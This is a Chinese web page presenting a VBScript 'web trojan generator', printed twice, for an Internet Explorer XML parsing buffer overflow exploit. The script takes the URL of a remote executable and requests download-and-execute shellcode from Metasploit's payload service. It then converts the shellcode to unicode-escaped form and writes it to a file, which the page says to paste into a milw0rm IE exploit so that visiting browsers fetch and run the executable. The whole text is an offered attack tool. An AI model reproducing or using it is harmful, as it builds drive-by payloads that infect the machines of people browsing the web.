网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day
程序员文章站
2022-08-27 16:18:21
'code by lcx on error resume next exeurl = inputbox( "请输入exe的地址:", "输入", "http://www.h...
'code by lcx
on error resume next
exeurl = inputbox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
url="http://www.metasploit.com:55555/payloads?parent=glob%280x25bfa38%29&module=win32_downloadexec&mode=generate&opt_url="&urlencoding(exeurl)&"&maxsize=&badchars=0x00+&encoder=default&action=generate+payload"
body = gethttppage(url)
set re = new regexp
re.pattern = "(\$shellcode \=[\s\s]+</div></pre>)"
set matches = re.execute(body)
if matches.count>0 then body = matches(0).value
code=trim(replace(replace(replace(replace(replace(replace(replace(body,"$shellcode =",""),chr(34),""),chr(13),""),";",""),"</div></pre>",""),chr(10),""),".",""))
function replaceregex(str)
set regex=new regexp
regex.pattern="\\x(..)\\x(..)"
regex.ignorecase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end function
function gethttppage(path)
t = getbody(path)
gethttppage = bytestobstr(t, "gb2312")
end function
function getbody(url)
on error resume next
set retrieval = createobject("microsoft.xmlhttp")
with retrieval
.open "get", url, false, "", ""
.send
getbody = .responsebody
end with
set retrieval = nothing
end function
function bytestobstr(body, cset)
dim objstream
set objstream = createobject("adodb.stream")
objstream.type = 1
objstream.mode = 3
objstream.open
objstream.write body
objstream.position = 0
objstream.type = 2
objstream.charset = cset
bytestobstr = objstream.readtext
objstream.close
set objstream = nothing
end function
function urlencoding(vstrin)
strreturn = ""
for aaaa = 1 to len(vstrin)
thischr = mid(vstrin,aaaa,1)
if abs(asc(thischr)) < &hff then
strreturn = strreturn & thischr
else
innercode = asc(thischr)
if innercode < 0 then
innercode = innercode + &h10000
end if
hight8 = (innercode and &hff00)\ &hff
low8 = innercode and &hff
strreturn = strreturn & "%" & hex(hight8) & "%" & hex(low8)
end if
next
urlencoding = strreturn
end function
set fso=createobject("scripting.filesystemobject")
set files=fso.opentextfile("a.txt",2,true)
files.writeline replaceregex(code)
'files.writeline body
wscript.echo replaceregex(code)
files.close
set fso=nothing
wscript.echo chr(13)&"ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"
on error resume next
exeurl = inputbox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
url="http://www.metasploit.com:55555/payloads?parent=glob%280x25bfa38%29&module=win32_downloadexec&mode=generate&opt_url="&urlencoding(exeurl)&"&maxsize=&badchars=0x00+&encoder=default&action=generate+payload"
body = gethttppage(url)
set re = new regexp
re.pattern = "(\$shellcode \=[\s\s]+</div></pre>)"
set matches = re.execute(body)
if matches.count>0 then body = matches(0).value
code=trim(replace(replace(replace(replace(replace(replace(replace(body,"$shellcode =",""),chr(34),""),chr(13),""),";",""),"</div></pre>",""),chr(10),""),".",""))
function replaceregex(str)
set regex=new regexp
regex.pattern="\\x(..)\\x(..)"
regex.ignorecase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end function
function gethttppage(path)
t = getbody(path)
gethttppage = bytestobstr(t, "gb2312")
end function
function getbody(url)
on error resume next
set retrieval = createobject("microsoft.xmlhttp")
with retrieval
.open "get", url, false, "", ""
.send
getbody = .responsebody
end with
set retrieval = nothing
end function
function bytestobstr(body, cset)
dim objstream
set objstream = createobject("adodb.stream")
objstream.type = 1
objstream.mode = 3
objstream.open
objstream.write body
objstream.position = 0
objstream.type = 2
objstream.charset = cset
bytestobstr = objstream.readtext
objstream.close
set objstream = nothing
end function
function urlencoding(vstrin)
strreturn = ""
for aaaa = 1 to len(vstrin)
thischr = mid(vstrin,aaaa,1)
if abs(asc(thischr)) < &hff then
strreturn = strreturn & thischr
else
innercode = asc(thischr)
if innercode < 0 then
innercode = innercode + &h10000
end if
hight8 = (innercode and &hff00)\ &hff
low8 = innercode and &hff
strreturn = strreturn & "%" & hex(hight8) & "%" & hex(low8)
end if
next
urlencoding = strreturn
end function
set fso=createobject("scripting.filesystemobject")
set files=fso.opentextfile("a.txt",2,true)
files.writeline replaceregex(code)
'files.writeline body
wscript.echo replaceregex(code)
files.close
set fso=nothing
wscript.echo chr(13)&"ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"